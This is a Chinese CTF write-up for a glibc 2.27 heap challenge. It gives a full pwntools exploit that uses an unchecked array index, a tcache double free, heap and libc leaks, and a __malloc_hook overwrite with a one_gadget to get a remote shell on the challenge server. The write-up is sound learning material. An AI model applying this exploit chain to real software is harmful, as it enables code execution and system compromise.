[原创]kanxue2019第四题 writeup
2019-3-12 11:47 2210
通过对同一个 chunk 连续释放两次而程序没有 abort(double free 未被检测),可以确定远程使用的是带 tcache 的 libc 版本(glibc ≥ 2.26;2.29 之前的 tcache 没有基于 key 字段的 double free 检查)。脚本中使用的偏移(main_arena 位于 0x3ebc40、one_gadget 位于 0x10a38c)与 Ubuntu 18.04 自带的 glibc 2.27 一致,推测题目给的 libc.so.6 即该版本。
因此是针对tcache的攻击利用。
程序漏洞:edit_singledog 中对传入的数组下标没有做范围检查,存在数组越界写,可以覆盖到相邻 luckdog 结构体中的 name 指针字段;从脚本看,后续 edit 会通过这个指针写入数据,因此越界写实际上给出了一个任意地址写原语。
首先对同一个 chunk 连续调用两次 save(double free),使它在 tcache 中出现两次;然后申请一次把它取回,此时其 fd(tcache next)指针仍指向 tcache 中的自己,也就是一个堆地址,写入一个字节后再打印 name 字段即可泄露堆地址。
然后通过越界写把某个 chunk 的 size 字段改为 0x91(0x90 超出 fastbin 范围,释放时不会进 fastbin),构造出一个 smallbin 大小的 chunk,再对该 chunk 连续释放 7 次,填满 0x90 的 tcache bin。再释放一次后,该 chunk 进入 unsorted bin;随后申请小 chunk 时它会被从 unsorted bin 整理进 0x90 的 small bin,此时其 fd/bk 指向 main_arena 中 0x90 small bin 的表头(main_arena+0xe0),申请回来并打印即可泄露 libc 地址(注意:泄露的是 small bin[0x90] 的地址,因此要先减去 0xe0,再减去 main_arena 在 libc 中的偏移 0x3ebc40)。
然后把被越界覆盖的 name 指针改为 __malloc_hook 的地址,再通过 edit 向该指针写入 one_gadget 地址(任意地址写),最后再触发一次 malloc(菜单选项 1)即可 getshell。注意 one_gadget 有寄存器/栈约束,需要选择在触发 malloc 时约束成立的那一个。
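from pwn import *
from ctypes import *
import os
#import roputils as rop

# ---------------------------------------------------------------------------
# Target / environment configuration
# ---------------------------------------------------------------------------
remote_addr = "211.159.175.39"
remote_port = 8686
local_addr = "127.0.0.1"
local_port = 1807
pc = "./apwn"

pwn_elf = ELF(pc)
pwn_rop = rop.ROP(pc)

uselibc = 2   # 0 for no, 1 for i386, 2 for x64
local = 0     # 1: spawn ./apwn locally; 0: connect to remote_addr; other: connect to local_addr
haslibc = 1   # 1: use the ./libc.so.6 shipped with the challenge
atta = 0      # 1: attach gdb to the local process

# glibc-specific offsets. Both only make sense for the libc shipped with the
# challenge (they match Ubuntu 18.04's glibc 2.27 as far as can be told from
# the numbers); recompute them if a different libc is used.
MAIN_ARENA_OFF = 0x3ebc40   # main_arena inside libc (== __malloc_hook + 0x10 on x86-64)
ONE_GADGET_OFF = 0x10a38c   # one_gadget candidate; its stack/register constraint
                            # must hold at the malloc() that fires the hook

context.arch = "amd64" if uselibc == 2 else "i386"

# Select the libc used to resolve symbols. Only the challenge's libc is
# loaded when haslibc is set; the 2.23 system paths are fallbacks for local
# testing without the provided library.
if haslibc == 0 and uselibc == 2:
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
elif haslibc == 0 and uselibc == 1:
    libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
    libc = ELF('./libc.so.6')

if local == 1:
    if haslibc:
        p = process(pc, env={'LD_PRELOAD': './libc.so.6'})
    else:
        p = process(pc)
elif local == 0:
    p = remote(remote_addr, remote_port)
else:
    p = remote(local_addr, local_port)

# Log every send/recv; the original set log_level to True (numeric 1), which
# has the same visible effect.
context.log_level = 'debug'

if local and atta:
    # Breakpoint is given as PIE offset + the default no-ASLR base.
    gdb.attach(p, 'b *0xd86+0x555555554000\n')


# ---------------------------------------------------------------------------
# Thin I/O helpers
# ---------------------------------------------------------------------------
def sla(a, b):
    """Wait for *a*, then send *b* followed by a newline."""
    p.sendlineafter(a, b)


def sa(a, b):
    """Wait for *a*, then send *b* without a trailing newline."""
    p.sendafter(a, b)


def ru(a):
    """Receive up to and including *a*; return everything read."""
    return p.recvuntil(a)


def rv(a):
    """Receive at most *a* bytes."""
    return p.recv(a)


def sn(a):
    """Send *a* verbatim."""
    p.send(a)


def lg(s, addr):
    """Print a leaked address *addr* labelled *s* in red so it stands out."""
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))


# ---------------------------------------------------------------------------
# Menu wrappers (prompt strings must match the binary byte-for-byte)
# ---------------------------------------------------------------------------
def add_singledog(name):
    """Menu 1: allocate a single dog and write *name* into it."""
    sla(b'>>\n', b'1')
    sa(b'Name:\n', name)


def add_lovedog(name1, name2):
    """Menu 2: allocate a love dog holding two names."""
    sla(b'>>\n', b'2')
    sa(b'Name\n', name1)
    sa(b'name\n', name2)


def edit_single(idx, name):
    """Menu 3: edit single dog *idx*.

    The binary does not bounds-check *idx* (see the write-up), so an index
    past the array reaches neighbouring objects; this is the primitive the
    exploit is built on.  The reply also echoes the current name, which is
    what the leaks read.
    """
    sla(b'>>\n', b'3')
    sla(b'which?\n', str(idx))
    sa(b'luck.\n', name)


def edit_love(idx, name1, name2):
    """Menu 4: edit love dog *idx*; *name2* is written through the pointer
    that the out-of-bounds edit_single can redirect."""
    sla(b'>>\n', b'4')
    sla(b'which?\n', str(idx))
    sa(b'name?\n', name1)
    sa(b'name\n', name2)


def save_dog():
    """Menu 5: save (frees a dog chunk; calling it twice double-frees)."""
    sla(b'>>\n', b'5')


# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------
def hack():
    """Run the full chain: heap leak -> libc leak -> __malloc_hook overwrite.

    Relies on this libc's tcache having no double-free ``key`` check (added in
    glibc 2.29) and on the index passed to edit_single not being validated.
    """
    cnt = 12

    # Stage 0: fill the dog arrays so the out-of-bounds index used below
    # (0x50) lands on an entry we control.
    for i in range(cnt):
        add_singledog(b'a')
    add_lovedog(b'b', b'b')

    # Stage 1: heap leak.  Saving twice frees the same chunk twice, so it sits
    # in tcache with its next pointer aimed at itself.  Taking it back and
    # overwriting only the low byte keeps the rest of that pointer intact;
    # the echo from edit_single then returns a heap address.
    save_dog()
    save_dog()
    add_singledog(b'\x10')
    edit_single(cnt - 2, b'\x10')
    ru(b'name: ')
    # 0x260: distance from the page base to the chunk we will forge below
    # (specific to this binary's heap layout).
    heap_addr = (u64(rv(6).ljust(8, b'\x00')) & 0xfffffffffffff000) + 0x260
    lg('heap_addr', heap_addr)

    # Stage 2: libc leak.  Through the OOB pointer write, forge a 0x91 size
    # field (0x90 is above the fastbin limit) on the chunk at heap_addr and
    # free it eight times: seven frees fill the 0x90 tcache bin, the eighth
    # lands in the unsorted bin.  The header is re-forged every round because
    # free() may scribble over it.
    for i in range(8):
        edit_single(0x50, p64(heap_addr - 0x10))    # aim pointer at chunk header
        edit_love(0, b'a', p64(0) + p64(0x91))      # prev_size = 0, size = 0x91
        edit_single(0x50, p64(heap_addr))           # aim pointer at chunk data
        save_dog()                                  # free it
    # The following small allocations sort the chunk out of the unsorted bin
    # into the 0x90 smallbin, so its fd/bk point at that bin's head
    # (main_arena + 0xe0).  One allocation is presumably carved from it:
    # eight bytes of 'a' clobber fd and the echo prints bk right after.
    add_singledog(b'a')
    add_singledog(b'a' * 8)
    edit_single(4, b'a' * 8)
    ru(b'a' * 8)
    libc.address = u64(rv(6).ljust(8, b'\x00')) - 0xe0 - MAIN_ARENA_OFF
    lg('libc', libc.address)

    # Stage 3: arbitrary write.  Redirect the OOB-reachable pointer to
    # __malloc_hook, write the gadget through it, then make the program
    # call malloc() (menu option 1).
    malloc_hook = libc.symbols['__malloc_hook']
    one_gadget = libc.address + ONE_GADGET_OFF
    edit_single(0x50, p64(malloc_hook))
    edit_love(0, b'a', p64(one_gadget))
    sla(b'>>\n', b'1')

    p.interactive()


hack()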